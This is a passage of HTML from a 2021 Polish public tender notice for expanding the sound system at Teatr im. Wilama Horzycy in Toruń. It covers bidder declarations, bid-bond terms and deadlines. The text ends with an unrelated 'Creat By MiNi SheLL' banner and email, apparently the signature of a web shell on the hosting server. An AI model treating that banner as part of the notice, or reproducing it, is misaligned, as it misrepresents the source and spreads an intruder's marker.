wpisu do rejestru lub ewidencji;<br/>(zgodnie z pkt 15.5)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">- wykazu dostaw wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty,</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Do oferty każdy wykonawca musi dołączyć aktualne na dzień składania ofert oświadczenie w<br/>zakresie wskazanym w załączniku nr 2 i 3 do SWZ. Informacje zawarte w oświadczeniach będą<br/>stanowić wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu oraz spełnia warunki<br/>Ogłoszenie nr 2021/BZP 00230092/01 z dnia 2021-10-12<br/>2021-10-12 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>udziału w postępowaniu.<br/>2) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenia, o<br/>których mowa w ust. 1 i 4.1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają<br/>brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w<br/>jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, przedstawia wraz z oświadczeniami, o których mowa w ust. 1 i 4.1<br/>SWZ, także oświadczenia podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w<br/>zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>4) Zamawiający zbada, czy nie zachodzą, wobec podmiotu podstawy wykluczenia, które zostały<br/>przewidziane względem wykonawcy (załącznik nr 2 do SWZ).<br/>5) Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie<br/>zamówienia, zamawiający może na każdym etapie postępowania, w tym na etapie składania<br/>ofert podlegających negocjacjom lub niezwłocznie po ich złożeniu, wezwać wykonawców do<br/>złożenia wszystkich lub niektórych podmiotowych środków dowodowych, jeżeli wymagał ich<br/>złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień ich<br/>złożenia.<br/>6) Inne dokumenty o ile są wymagane zgodnie z SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca jest zobowiązany do zabezpieczenia swojej oferty wadium w wysokości: 1.500,00 PLN (słownie złotych: jeden tysiąc pięćset złotych).<br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy.<br/>3.	Wadium może być wniesione według wyboru Wykonawcy w jednej lub kilku następujących formach: :<br/>a.	w pieniądzu – wyłącznie przelewem na rachunek bankowy wskazany poniżej, <br/>b.	gwarancjach bankowych,<br/>c.	gwarancjach ubezpieczeniowych,<br/>d.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. j. Dz. U. z 2020 r., poz. 299).<br/>4.	Wadium w pieniądzu: należy wpłacić przelewem na konto Zamawiającego: Powszechna Kasa Oszczędności Bank Polski SA nr 86 1020 1462 0000 7802 0365 9190, z zaznaczeniem, że dotyczy przetargu pn.: „Rozbudowa systemu nagłośnienia Dużej Sceny wraz z zakupem mikroportów”.<br/>a.	za datę wniesienia wadium uznaje się datę uznania rachunku Zamawiającego,<br/>b.	Zamawiający dokona sprawdzenia czasu wpływu wadium na swoje konto.<br/>5.	Zamawiający zastrzega, że w razie składania gwarancji lub poręczeń jako wadium przetargowego:<br/>a.	Wykonawca zobowiązany jest do przekazania wraz z ofertą oryginału gwarancji lub poręczenia, w postaci elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym osób upoważnionych do ich wystawienia tj. wystawcę dokumentu;<br/>b.	gwarancje oraz poręczenia muszą mieć datę początkową ważności równą co najmniej ostatecznemu terminowi składania ofert, a datę końcową ważności upływającą najwcześniej w ostatnim dniu związania ofertą;<br/>c.	gwarancje oraz poręczenia muszą obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium określone w ustawie;<br/>d.	gwarancje oraz poręczenia powinny być wystawione na Teatr im. Wilama Horzycy w Toruniu, z ich treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>e.	gwarancje oraz poręczenia muszą określać bezwarunkowe i nieodwołalne prawo Zamawiającego do ich realizacji, na pierwsze żądanie Zamawiającego;<br/>f.	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 ustawy), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>g.	gwarancje oraz poręczenia, w których ograniczono prawa Zamawiającego, lub w których uzależniono realizację od spełnienia jakichkolwiek warunków przez Zamawiającego do wykonania których Zamawiający nie wyraził zgody na piśmie, uznane zostaną jako nie spełniające warunków.<br/>6.	Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy zostanie odrzucona.<br/>7.	Zasady zwrotu oraz okoliczności zatrzymania wadium określa ustawa. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku,<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) oświadczenia o których mowa w pkt. 15.1. SWZ składa z ofertą każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>b) w przypadku, o którym mowa w rozdziale 11.2 SWZ Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. Oświadczenie należy złożyć<br/>wg wymogów załącznika do SWZ.<br/>c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o<br/>których mowa w pkt. 15.5.1 SWZ, przy czym podmiotowe środki dowodowe, o których mowa w<br/>pkt. 15.5.1 b SWZ składa odpowiednio Wykonawca / Wykonawcy, który/którzy wykazuje/-ą<br/>spełnienie warunku.<br/>3. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia<br/>publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie treścią zał. nr 8 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-02 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w Instrukcji użytkownika, dostępnej na stronie: https://miniportal.uzp.gov.pl/ .</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-02 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com